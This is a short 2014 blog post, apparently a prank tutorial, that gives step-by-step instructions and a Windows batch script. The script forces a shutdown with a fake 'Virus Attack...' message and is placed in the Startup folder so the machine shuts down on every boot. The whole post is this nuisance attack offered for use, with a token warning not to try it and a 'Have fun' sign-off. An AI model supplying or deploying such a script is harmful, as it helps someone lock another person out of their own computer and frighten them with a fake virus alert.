Sunday 4 May 2014

Trick To Shutdown A Computer EveryTime On Startup !!!!!!!!!!!

Trick To Shutdown A Computer EveryTime On Startup
Follow these steps:
1)Open notepad
2) type code:

@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit

3) save file as filename.bat
4) GOTO start=> All program=> right click on startup=> open


5) paste the batch file in this folder That's all , now the computer will automatically shutdown on every startup..
Warning :
Don't Try This In Your Computer

Have fun... :)

0 comments:

Post a Comment